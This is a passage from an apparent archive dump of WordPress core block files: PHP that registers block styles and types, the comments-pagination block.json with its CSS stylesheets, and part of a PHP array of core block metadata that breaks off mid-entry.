		);

		// Save core block style paths in cache when not in development mode.
		if ( $can_use_cached ) {
			set_transient(
				$transient_name,
				array(
					'version' => $wp_version,
					'files'   => $files,
				)
			);
		}
	}

	$register_style = static function ( $name, $filename, $style_handle ) use ( $blocks_url, $suffix, $wp_styles, $files ) {
		$style_path = "{$name}/{$filename}{$suffix}.css";
		$path       = wp_normalize_path( BLOCKS_PATH . $style_path );

		if ( ! in_array( $style_path, $files, true ) ) {
			$wp_styles->add(
				$style_handle,
				false
			);
			return;
		}

		$wp_styles->add( $style_handle, $blocks_url . $style_path );
		$wp_styles->add_data( $style_handle, 'path', $path );

		$rtl_file = "{$name}/{$filename}-rtl{$suffix}.css";
		if ( is_rtl() && in_array( $rtl_file, $files, true ) ) {
			$wp_styles->add_data( $style_handle, 'rtl', 'replace' );
			$wp_styles->add_data( $style_handle, 'suffix', $suffix );
			$wp_styles->add_data( $style_handle, 'path', str_replace( "{$suffix}.css", "-rtl{$suffix}.css", $path ) );
		}
	};

	foreach ( $core_blocks_meta as $name => $schema ) {
		/** This filter is documented in wp-includes/blocks.php */
		$schema = apply_filters( 'block_type_metadata', $schema );

		// Backfill these properties similar to `register_block_type_from_metadata()`.
		if ( ! isset( $schema['style'] ) ) {
			$schema['style'] = "wp-block-{$name}";
		}
		if ( ! isset( $schema['editorStyle'] ) ) {
			$schema['editorStyle'] = "wp-block-{$name}-editor";
		}

		// Register block theme styles.
		$register_style( $name, 'theme', "wp-block-{$name}-theme" );

		foreach ( $style_fields as $style_field => $filename ) {
			$style_handle = $schema[ $style_field ];
			if ( is_array( $style_handle ) ) {
				continue;
			}
			$register_style( $name, $filename, $style_handle );
		}
	}
}
add_action( 'init', 'register_core_block_style_handles', 9 );

/**
 * Registers core block types using metadata files.
 * Dynamic core blocks are registered separately.
 *
 * @since 5.5.0
 */
function register_core_block_types_from_metadata() {
	$block_folders = require BLOCKS_PATH . 'require-static-blocks.php';
	foreach ( $block_folders as $block_folder ) {
		register_block_type_from_metadata(
			BLOCKS_PATH . $block_folder
		);
	}
}
add_action( 'init', 'register_core_block_types_from_metadata' );
comments-pagination/block.json000060400000002720151330427370012507 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/comments-pagination",
	"title": "Comments Pagination",
	"category": "theme",
	"parent": [ "core/comments" ],
	"allowedBlocks": [
		"core/comments-pagination-previous",
		"core/comments-pagination-numbers",
		"core/comments-pagination-next"
	],
	"description": "Displays a paginated navigation to next/previous set of comments, when applicable.",
	"textdomain": "default",
	"attributes": {
		"paginationArrow": {
			"type": "string",
			"default": "none"
		}
	},
	"providesContext": {
		"comments/paginationArrow": "paginationArrow"
	},
	"supports": {
		"align": true,
		"reusable": false,
		"html": false,
		"color": {
			"gradients": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true,
				"link": true
			}
		},
		"layout": {
			"allowSwitching": false,
			"allowInheriting": false,
			"default": {
				"type": "flex"
			}
		},
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-comments-pagination-editor",
	"style": "wp-block-comments-pagination"
}
comments-pagination/style-rtl.css000060400000002045151330427370013173 0ustar00.wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{
  margin-bottom:.5em;
  margin-right:.5em;
}
.wp-block-comments-pagination>.wp-block-comments-pagination-next:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-previous:last-child{
  margin-right:0;
}
.wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow{
  display:inline-block;
  margin-left:1ch;
}
.wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow:not(.is-arrow-chevron){
  transform:scaleX(-1);;
}
.wp-block-comments-pagination .wp-block-comments-pagination-next-arrow{
  display:inline-block;
  margin-right:1ch;
}
.wp-block-comments-pagination .wp-block-comments-pagination-next-arrow:not(.is-arrow-chevron){
  transform:scaleX(-1);;
}
.wp-block-comments-pagination.aligncenter{
  justify-content:center;
}comments-pagination/editor-rtl.min.css000060400000001355151330427370014106 0ustar00.wp-block[data-align=center]>.wp-block-comments-pagination{justify-content:center}.editor-styles-wrapper .wp-block-comments-pagination{max-width:100%}.editor-styles-wrapper .wp-block-comments-pagination.block-editor-block-list__layout{margin:0}.wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{margin-bottom:.5em;margin-right:.5em;margin-top:.5em}.wp-block-comments-pagination>.wp-block-comments-pagination-next:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-previous:last-child{margin-right:0}comments-pagination/style-rtl.min.css000060400000001761151330427370013761 0ustar00.wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{margin-bottom:.5em;margin-right:.5em}.wp-block-comments-pagination>.wp-block-comments-pagination-next:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-previous:last-child{margin-right:0}.wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow{display:inline-block;margin-left:1ch}.wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow:not(.is-arrow-chevron){transform:scaleX(-1)}.wp-block-comments-pagination .wp-block-comments-pagination-next-arrow{display:inline-block;margin-right:1ch}.wp-block-comments-pagination .wp-block-comments-pagination-next-arrow:not(.is-arrow-chevron){transform:scaleX(-1)}.wp-block-comments-pagination.aligncenter{justify-content:center}comments-pagination/editor-rtl.css000060400000001422151330427370013317 0ustar00.wp-block[data-align=center]>.wp-block-comments-pagination{
  justify-content:center;
}

.editor-styles-wrapper .wp-block-comments-pagination{
  max-width:100%;
}
.editor-styles-wrapper .wp-block-comments-pagination.block-editor-block-list__layout{
  margin:0;
}

.wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{
  margin-bottom:.5em;
  margin-right:.5em;
  margin-top:.5em;
}
.wp-block-comments-pagination>.wp-block-comments-pagination-next:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-previous:last-child{
  margin-right:0;
}comments-pagination/editor.css000060400000001357151330427370012527 0ustar00.wp-block[data-align=center]>.wp-block-comments-pagination{
  justify-content:center;
}

.editor-styles-wrapper .wp-block-comments-pagination{
  max-width:100%;
}
.editor-styles-wrapper .wp-block-comments-pagination.block-editor-block-list__layout{
  margin:0;
}

.wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{
  margin:.5em .5em .5em 0;
}
.wp-block-comments-pagination>.wp-block-comments-pagination-next:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-previous:last-child{
  margin-right:0;
}comments-pagination/editor.min.css000060400000001320151330427370013277 0ustar00.wp-block[data-align=center]>.wp-block-comments-pagination{justify-content:center}.editor-styles-wrapper .wp-block-comments-pagination{max-width:100%}.editor-styles-wrapper .wp-block-comments-pagination.block-editor-block-list__layout{margin:0}.wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{margin:.5em .5em .5em 0}.wp-block-comments-pagination>.wp-block-comments-pagination-next:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-previous:last-child{margin-right:0}comments-pagination/style.min.css000060400000001757151330427370013167 0ustar00.wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{margin-bottom:.5em;margin-right:.5em}.wp-block-comments-pagination>.wp-block-comments-pagination-next:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-previous:last-child{margin-right:0}.wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow{display:inline-block;margin-right:1ch}.wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow:not(.is-arrow-chevron){transform:scaleX(1)}.wp-block-comments-pagination .wp-block-comments-pagination-next-arrow{display:inline-block;margin-left:1ch}.wp-block-comments-pagination .wp-block-comments-pagination-next-arrow:not(.is-arrow-chevron){transform:scaleX(1)}.wp-block-comments-pagination.aligncenter{justify-content:center}comments-pagination/style.css000060400000002041151330427370012370 0ustar00.wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{
  margin-bottom:.5em;
  margin-right:.5em;
}
.wp-block-comments-pagination>.wp-block-comments-pagination-next:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-previous:last-child{
  margin-right:0;
}
.wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow{
  display:inline-block;
  margin-right:1ch;
}
.wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow:not(.is-arrow-chevron){
  transform:scaleX(1);
}
.wp-block-comments-pagination .wp-block-comments-pagination-next-arrow{
  display:inline-block;
  margin-left:1ch;
}
.wp-block-comments-pagination .wp-block-comments-pagination-next-arrow:not(.is-arrow-chevron){
  transform:scaleX(1);
}
.wp-block-comments-pagination.aligncenter{
  justify-content:center;
}blocks-json.php000060400000521223151330427370007507 0ustar00<?php return array(
  'archives' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/archives',
    'title' => 'Archives',
    'category' => 'widgets',
    'description' => 'Display a date archive of your posts.',
    'textdomain' => 'default',
    'attributes' => array(
      'displayAsDropdown' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'showLabel' => array(
        'type' => 'boolean',
        'default' => true
      ),
      'showPostCounts' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'type' => array(
        'type' => 'string',
        'default' => 'monthly'
      )
    ),
    'supports' => array(
      'align' => true,
      'html' => false,
      'spacing' => array(
        'margin' => true,
        'padding' => true,
        '__experimentalDefaultControls' => array(
          'margin' => false,
          'padding' => false
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-archives-editor'
  ),
  'audio' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/audio',
    'title' => 'Audio',
    'category' => 'media',
    'description' => 'Embed a simple audio player.',
    'keywords' => array(
      'music',
      'sound',
      'podcast',
      'recording'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'src' => array(
        'type' => 'string',
        'source' => 'attribute',
        'selector' => 'audio',
        'attribute' => 'src',
        '__experimentalRole' => 'content'
      ),
      'caption' => array(
        'type' => 'rich-text',
        'source' => 'rich-text',
        'selector' => 'figcaption',
        '__experimentalRole' => 'content'
      ),
      'id' => array(
        'type' => 'number',
        '__experimentalRole' => 'content'
      ),
      'autoplay' => array(
        'type' => 'boolean',
        'source' => 'attribute',
        'selector' => 'audio',
        'attribute' => 'autoplay'
      ),
      'loop' => array(
        'type' => 'boolean',
        'source' => 'attribute',
        'selector' => 'audio',
        'attribute' => 'loop'
      ),
      'preload' => array(
        'type' => 'string',
        'source' => 'attribute',
        'selector' => 'audio',
        'attribute' => 'preload'
      )
    ),
    'supports' => array(
      'anchor' => true,
      'align' => true,
      'spacing' => array(
        'margin' => true,
        'padding' => true,
        '__experimentalDefaultControls' => array(
          'margin' => false,
          'padding' => false
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-audio-editor',
    'style' => 'wp-block-audio'
  ),
  'avatar' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/avatar',
    'title' => 'Avatar',
    'category' => 'theme',
    'description' => 'Add a user’s avatar.',
    'textdomain' => 'default',
    'attributes' => array(
      'userId' => array(
        'type' => 'number'
      ),
      'size' => array(
        'type' => 'number',
        'default' => 96
      ),
      'isLink' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'linkTarget' => array(
        'type' => 'string',
        'default' => '_self'
      )
    ),
    'usesContext' => array(
      'postType',
      'postId',
      'commentId'
    ),
    'supports' => array(
      'html' => false,
      'align' => true,
      'alignWide' => false,
      'spacing' => array(
        'margin' => true,
        'padding' => true,
        '__experimentalDefaultControls' => array(
          'margin' => false,
          'padding' => false
        )
      ),
      '__experimentalBorder' => array(
        '__experimentalSkipSerialization' => true,
        'radius' => true,
        'width' => true,
        'color' => true,
        'style' => true,
        '__experimentalDefaultControls' => array(
          'radius' => true
        )
      ),
      'color' => array(
        'text' => false,
        'background' => false,
        '__experimentalDuotone' => 'img'
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'selectors' => array(
      'border' => '.wp-block-avatar img'
    ),
    'editorStyle' => 'wp-block-avatar-editor',
    'style' => 'wp-block-avatar'
  ),
  'block' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/block',
    'title' => 'Pattern',
    'category' => 'reusable',
    'description' => 'Reuse this design across your site.',
    'keywords' => array(
      'reusable'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'ref' => array(
        'type' => 'number'
      ),
      'content' => array(
        'type' => 'object',
        'default' => array(
          
        )
      )
    ),
    'providesContext' => array(
      'pattern/overrides' => 'content'
    ),
    'supports' => array(
      'customClassName' => false,
      'html' => false,
      'inserter' => false,
      'renaming' => false,
      'interactivity' => array(
        'clientNavigation' => true
      )
    )
  ),
  'button' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/button',
    'title' => 'Button',
    'category' => 'design',
    'parent' => array(
      'core/buttons'
    ),
    'description' => 'Prompt visitors to take action with a button-style link.',
    'keywords' => array(
      'link'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'tagName' => array(
        'type' => 'string',
        'enum' => array(
          'a',
          'button'
        ),
        'default' => 'a'
      ),
      'type' => array(
        'type' => 'string',
        'default' => 'button'
      ),
      'textAlign' => array(
        'type' => 'string'
      ),
      'url' => array(
        'type' => 'string',
        'source' => 'attribute',
        'selector' => 'a',
        'attribute' => 'href',
        '__experimentalRole' => 'content'
      ),
      'title' => array(
        'type' => 'string',
        'source' => 'attribute',
        'selector' => 'a,button',
        'attribute' => 'title',
        '__experimentalRole' => 'content'
      ),
      'text' => array(
        'type' => 'rich-text',
        'source' => 'rich-text',
        'selector' => 'a,button',
        '__experimentalRole' => 'content'
      ),
      'linkTarget' => array(
        'type' => 'string',
        'source' => 'attribute',
        'selector' => 'a',
        'attribute' => 'target',
        '__experimentalRole' => 'content'
      ),
      'rel' => array(
        'type' => 'string',
        'source' => 'attribute',
        'selector' => 'a',
        'attribute' => 'rel',
        '__experimentalRole' => 'content'
      ),
      'placeholder' => array(
        'type' => 'string'
      ),
      'backgroundColor' => array(
        'type' => 'string'
      ),
      'textColor' => array(
        'type' => 'string'
      ),
      'gradient' => array(
        'type' => 'string'
      ),
      'width' => array(
        'type' => 'number'
      )
    ),
    'supports' => array(
      'anchor' => true,
      'splitting' => true,
      'align' => false,
      'alignWide' => false,
      'color' => array(
        '__experimentalSkipSerialization' => true,
        'gradients' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'reusable' => false,
      'shadow' => array(
        '__experimentalSkipSerialization' => true
      ),
      'spacing' => array(
        '__experimentalSkipSerialization' => true,
        'padding' => array(
          'horizontal',
          'vertical'
        ),
        '__experimentalDefaultControls' => array(
          'padding' => true
        )
      ),
      '__experimentalBorder' => array(
        'color' => true,
        'radius' => true,
        'style' => true,
        'width' => true,
        '__experimentalSkipSerialization' => true,
        '__experimentalDefaultControls' => array(
          'color' => true,
          'radius' => true,
          'style' => true,
          'width' => true
        )
      ),
      '__experimentalSelector' => '.wp-block-button .wp-block-button__link',
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'styles' => array(
      array(
        'name' => 'fill',
        'label' => 'Fill',
        'isDefault' => true
      ),
      array(
        'name' => 'outline',
        'label' => 'Outline'
      )
    ),
    'editorStyle' => 'wp-block-button-editor',
    'style' => 'wp-block-button'
  ),
  'buttons' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/buttons',
    'title' => 'Buttons',
    'category' => 'design',
    'allowedBlocks' => array(
      'core/button'
    ),
    'description' => 'Prompt visitors to take action with a group of button-style links.',
    'keywords' => array(
      'link'
    ),
    'textdomain' => 'default',
    'supports' => array(
      'anchor' => true,
      'align' => array(
        'wide',
        'full'
      ),
      'html' => false,
      '__experimentalExposeControlsToChildren' => true,
      'spacing' => array(
        'blockGap' => true,
        'margin' => array(
          'top',
          'bottom'
        ),
        '__experimentalDefaultControls' => array(
          'blockGap' => true
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'layout' => array(
        'allowSwitching' => false,
        'allowInheriting' => false,
        'default' => array(
          'type' => 'flex'
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-buttons-editor',
    'style' => 'wp-block-buttons'
  ),
  'calendar' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/calendar',
    'title' => 'Calendar',
    'category' => 'widgets',
    'description' => 'A calendar of your site’s posts.',
    'keywords' => array(
      'posts',
      'archive'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'month' => array(
        'type' => 'integer'
      ),
      'year' => array(
        'type' => 'integer'
      )
    ),
    'supports' => array(
      'align' => true,
      'color' => array(
        'link' => true,
        '__experimentalSkipSerialization' => array(
          'text',
          'background'
        ),
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        ),
        '__experimentalSelector' => 'table, th'
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'style' => 'wp-block-calendar'
  ),
  'categories' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/categories',
    'title' => 'Categories List',
    'category' => 'widgets',
    'description' => 'Display a list of all categories.',
    'textdomain' => 'default',
    'attributes' => array(
      'displayAsDropdown' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'showHierarchy' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'showPostCounts' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'showOnlyTopLevel' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'showEmpty' => array(
        'type' => 'boolean',
        'default' => false
      )
    ),
    'supports' => array(
      'align' => true,
      'html' => false,
      'spacing' => array(
        'margin' => true,
        'padding' => true,
        '__experimentalDefaultControls' => array(
          'margin' => false,
          'padding' => false
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-categories-editor',
    'style' => 'wp-block-categories'
  ),
  'code' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/code',
    'title' => 'Code',
    'category' => 'text',
    'description' => 'Display code snippets that respect your spacing and tabs.',
    'textdomain' => 'default',
    'attributes' => array(
      'content' => array(
        'type' => 'rich-text',
        'source' => 'rich-text',
        'selector' => 'code',
        '__unstablePreserveWhiteSpace' => true
      )
    ),
    'supports' => array(
      'align' => array(
        'wide'
      ),
      'anchor' => true,
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'spacing' => array(
        'margin' => array(
          'top',
          'bottom'
        ),
        'padding' => true,
        '__experimentalDefaultControls' => array(
          'margin' => false,
          'padding' => false
        )
      ),
      '__experimentalBorder' => array(
        'radius' => true,
        'color' => true,
        'width' => true,
        'style' => true,
        '__experimentalDefaultControls' => array(
          'width' => true,
          'color' => true
        )
      ),
      'color' => array(
        'text' => true,
        'background' => true,
        'gradients' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'style' => 'wp-block-code'
  ),
  'column' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/column',
    'title' => 'Column',
    'category' => 'design',
    'parent' => array(
      'core/columns'
    ),
    'description' => 'A single column within a columns block.',
    'textdomain' => 'default',
    'attributes' => array(
      'verticalAlignment' => array(
        'type' => 'string'
      ),
      'width' => array(
        'type' => 'string'
      ),
      'allowedBlocks' => array(
        'type' => 'array'
      ),
      'templateLock' => array(
        'type' => array(
          'string',
          'boolean'
        ),
        'enum' => array(
          'all',
          'insert',
          'contentOnly',
          false
        )
      )
    ),
    'supports' => array(
      '__experimentalOnEnter' => true,
      'anchor' => true,
      'reusable' => false,
      'html' => false,
      'color' => array(
        'gradients' => true,
        'heading' => true,
        'button' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      'shadow' => true,
      'spacing' => array(
        'blockGap' => true,
        'padding' => true,
        '__experimentalDefaultControls' => array(
          'padding' => true,
          'blockGap' => true
        )
      ),
      '__experimentalBorder' => array(
        'color' => true,
        'style' => true,
        'width' => true,
        '__experimentalDefaultControls' => array(
          'color' => true,
          'style' => true,
          'width' => true
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'layout' => true,
      'interactivity' => array(
        'clientNavigation' => true
      )
    )
  ),
  'columns' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/columns',
    'title' => 'Columns',
    'category' => 'design',
    'allowedBlocks' => array(
      'core/column'
    ),
    'description' => 'Display content in multiple columns, with blocks added to each column.',
    'textdomain' => 'default',
    'attributes' => array(
      'verticalAlignment' => array(
        'type' => 'string'
      ),
      'isStackedOnMobile' => array(
        'type' => 'boolean',
        'default' => true
      ),
      'templateLock' => array(
        'type' => array(
          'string',
          'boolean'
        ),
        'enum' => array(
          'all',
          'insert',
          'contentOnly',
          false
        )
      )
    ),
    'supports' => array(
      'anchor' => true,
      'align' => array(
        'wide',
        'full'
      ),
      'html' => false,
      'color' => array(
        'gradients' => true,
        'link' => true,
        'heading' => true,
        'button' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      'spacing' => array(
        'blockGap' => array(
          '__experimentalDefault' => '2em',
          'sides' => array(
            'horizontal',
            'vertical'
          )
        ),
        'margin' => array(
          'top',
          'bottom'
        ),
        'padding' => true,
        '__experimentalDefaultControls' => array(
          'padding' => true,
          'blockGap' => true
        )
      ),
      'layout' => array(
        'allowSwitching' => false,
        'allowInheriting' => false,
        'allowEditing' => false,
        'default' => array(
          'type' => 'flex',
          'flexWrap' => 'nowrap'
        )
      ),
      '__experimentalBorder' => array(
        'color' => true,
        'radius' => true,
        'style' => true,
        'width' => true,
        '__experimentalDefaultControls' => array(
          'color' => true,
          'radius' => true,
          'style' => true,
          'width' => true
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      ),
      'shadow' => true
    ),
    'editorStyle' => 'wp-block-columns-editor',
    'style' => 'wp-block-columns'
  ),
  'comment-author-name' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/comment-author-name',
    'title' => 'Comment Author Name',
    'category' => 'theme',
    'ancestor' => array(
      'core/comment-template'
    ),
    'description' => 'Displays the name of the author of the comment.',
    'textdomain' => 'default',
    'attributes' => array(
      'isLink' => array(
        'type' => 'boolean',
        'default' => true
      ),
      'linkTarget' => array(
        'type' => 'string',
        'default' => '_self'
      ),
      'textAlign' => array(
        'type' => 'string'
      )
    ),
    'usesContext' => array(
      'commentId'
    ),
    'supports' => array(
      'html' => false,
      'spacing' => array(
        'margin' => true,
        'padding' => true
      ),
      'color' => array(
        'gradients' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true,
          'link' => true
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    )
  ),
  'comment-content' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/comment-content',
    'title' => 'Comment Content',
    'category' => 'theme',
    'ancestor' => array(
      'core/comment-template'
    ),
    'description' => 'Displays the contents of a comment.',
    'textdomain' => 'default',
    'usesContext' => array(
      'commentId'
    ),
    'attributes' => array(
      'textAlign' => array(
        'type' => 'string'
      )
    ),
    'supports' => array(
      'color' => array(
        'gradients' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'spacing' => array(
        'padding' => array(
          'horizontal',
          'vertical'
        ),
        '__experimentalDefaultControls' => array(
          'padding' => true
        )
      ),
      'html' => false
    )
  ),
  'comment-date' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/comment-date',
    'title' => 'Comment Date',
    'category' => 'theme',
    'ancestor' => array(
      'core/comment-template'
    ),
    'description' => 'Displays the date on which the comment was posted.',
    'textdomain' => 'default',
    'attributes' => array(
      'format' => array(
        'type' => 'string'
      ),
      'isLink' => array(
        'type' => 'boolean',
        'default' => true
      )
    ),
    'usesContext' => array(
      'commentId'
    ),
    'supports' => array(
      'html' => false,
      'color' => array(
        'gradients' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true,
          'link' => true
        )
      ),
      'spacing' => array(
        'margin' => true,
        'padding' => true
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
